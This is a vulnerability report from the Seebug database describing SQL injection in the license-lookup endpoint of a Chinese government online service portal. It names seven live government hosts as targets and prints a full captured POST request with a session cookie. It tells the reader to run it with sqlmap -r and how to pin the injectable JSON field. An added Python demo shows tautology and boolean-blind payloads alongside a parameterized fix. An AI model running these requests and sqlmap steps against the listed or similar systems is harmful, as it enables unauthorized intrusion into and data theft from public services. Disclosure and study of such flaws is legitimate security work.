POST injection vulnerability in a government service system

2015-03-04T00:00:00
ID SSV:95848
Type seebug
Reporter Root
Modified 2015-03-04T00:00:00

Description

Brief description:

See title.

Details:

Affected instances (each one has to be captured and tested separately):

http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/newLicenseManage.jsp
http://117.40.187.175:8008/outportal/licenseManage/newLicenseManage.jsp
http://wssp.jdz.gov.cn/outportal/licenseManage/newLicenseManage.jsp
http://xzfw.jinxi.gov.cn/outportal/licenseManage/newLicenseManage.jsp
http://wssp.lepingshi.gov.cn/outportal/licenseManage/newLicenseManage.jsp
http://xzfw.jxcr.gov.cn/outportal/licenseManage/newLicenseManage.jsp
http://120.203.196.20/outportal/licenseManage/newLicenseManage.jsp

1. Test case: http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/newLicenseManage.jsp

<img src="https://images.seebug.org/upload/201503/021548340041f90ff657f13f50092586ff51d97b.png" alt="7.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201503/02154846be96c4187365f16d3aa5fb964debad86.png" alt="8.png" width="600" onerror="javascript:errimg(this);">

POST parameters (the request as captured; the injection points are the values in the JSON map of the body):

POST /outportal/command/ajax/com.ecgap.outinformationdocument.cmd.OutInformationDocumentCommand/getLicese HTTP/1.1
Host: wssp.jiangxi.gov.cn:8008
Proxy-Connection: keep-alive
Content-Length: 91
Origin: http://wssp.jiangxi.gov.cn:8008
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Content-Type: application/json
Accept: */*
Referer: http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/newLicenseManage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=9E6BB805520597F8458E70206F8EF271

{"params":{"javaClass":"ParameterSet","map":{"acceptno":"1111","cerno":"1111"},"length":2}}

Save the request to a file and run it with sqlmap -r.

<img src="https://images.seebug.org/upload/201503/021553305104c61cce41f73df23babce9ee628b4.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201503/0215534880d275746dc39d36faf798203acc1f4b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">
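The following is an added example, not code from the original report or from the affected ecgap application. It reproduces the bug class in Python against a constructed in-memory SQLite table (the table name, column names and rows are assumptions) so that the behaviour sqlmap detects on the getLicese endpoint can be seen offline: the values of `acceptno` and `cerno` from the JSON map are concatenated straight into the WHERE clause, a tautology in `cerno` returns every row, and a boolean-based blind probe of the kind sqlmap automates leaks data one comparison at a time. The parameterized version beside it returns nothing for the same payloads. The real endpoint is a Java command class, so the corresponding fix there is a PreparedStatement with bound parameters.

```python
import json
import sqlite3


def make_db():
    """Constructed stand-in for the license table behind getLicese (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE license (acceptno TEXT, cerno TEXT, holder TEXT)")
    db.executemany(
        "INSERT INTO license VALUES (?, ?, ?)",
        [("2015001", "C-100", "Alice Co."), ("2015002", "C-200", "Bob Ltd.")],
    )
    return db


def request(acceptno, cerno):
    """Build the JSON body in the ParameterSet shape seen in the captured POST."""
    return json.dumps({
        "params": {
            "javaClass": "ParameterSet",
            "map": {"acceptno": acceptno, "cerno": cerno},
            "length": 2,
        }
    })


def get_license_vulnerable(db, body):
    """Bug class from the report: JSON map values are spliced into the SQL text."""
    params = json.loads(body)["params"]["map"]
    sql = "SELECT holder FROM license WHERE acceptno = '%s' AND cerno = '%s'" % (
        params["acceptno"], params["cerno"])
    return [row[0] for row in db.execute(sql)]


def get_license_fixed(db, body):
    """Same lookup with bound parameters: the values can never change the query."""
    params = json.loads(body)["params"]["map"]
    sql = "SELECT holder FROM license WHERE acceptno = ? AND cerno = ?"
    return [row[0] for row in db.execute(sql, (params["acceptno"], params["cerno"]))]


def blind_probe_vulnerable(db, guess):
    """Boolean-based blind check: True iff the first character of the holder of
    acceptno 2015001 equals `guess`, judged only by whether rows come back."""
    payload = ("1111' OR substr((SELECT holder FROM license "
               "WHERE acceptno='2015001'),1,1)='%s" % guess)
    return bool(get_license_vulnerable(db, request("1111", payload)))


if __name__ == "__main__":
    db = make_db()
    benign = request("1111", "1111")
    tautology = request("1111", "1111' OR '1'='1")
    print("vulnerable, benign  :", get_license_vulnerable(db, benign))
    print("vulnerable, tautology:", get_license_vulnerable(db, tautology))
    print("fixed, tautology     :", get_license_fixed(db, tautology))
    print("blind probe 'A'      :", blind_probe_vulnerable(db, "A"))
    print("blind probe 'B'      :", blind_probe_vulnerable(db, "B"))
```

When feeding the captured request to sqlmap, keep the `Content-Type: application/json` header in the file so the JSON body is parsed into parameters; a single injection point can be pinned by placing `*` directly after the value to test (for example `"cerno":"1111*"`).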

Proof of vulnerability:

<img src="https://images.seebug.org/upload/201503/021553305104c61cce41f73df23babce9ee628b4.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201503/0215534880d275746dc39d36faf798203acc1f4b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">